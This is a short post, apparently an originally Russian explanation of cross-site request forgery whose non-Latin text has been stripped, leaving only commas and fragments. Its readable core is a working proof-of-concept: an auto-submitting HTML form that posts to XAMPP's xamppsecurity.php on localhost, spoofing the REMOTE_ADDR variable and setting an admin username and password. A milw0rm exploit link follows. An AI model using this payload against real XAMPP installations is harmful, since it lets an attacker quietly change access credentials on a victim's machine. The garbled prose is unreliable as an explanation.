CSRF XSRF Cross-Site Request Forgery. , "" HTTP-, html javascript, . CSRF, XAMPP. , html/js POST, "" . CSRF XAMPP, .
<html>
<form action='http://127.0.0.1/security/xamppsecurity.php' method='POST' id=1>
<input type="hidden" name="_SERVER[REMOTE_ADDR]" value="127.0.0.1">
<input type=hidden name="xamppuser" value=admin >
<input type=hidden name="xampppasswd" value=password>
<input type=hidden name="xamppaccess" value="Make+safe+the+XAMPP+directory">
<input type=submit>
</form>
</html>
<script>
document.getElementById(1).submit();
</script>
, . sesion basic-auth, . , , . , . CAN , XSS. , , CSRF XSS: http://www.milw0rm.com/exploits/7922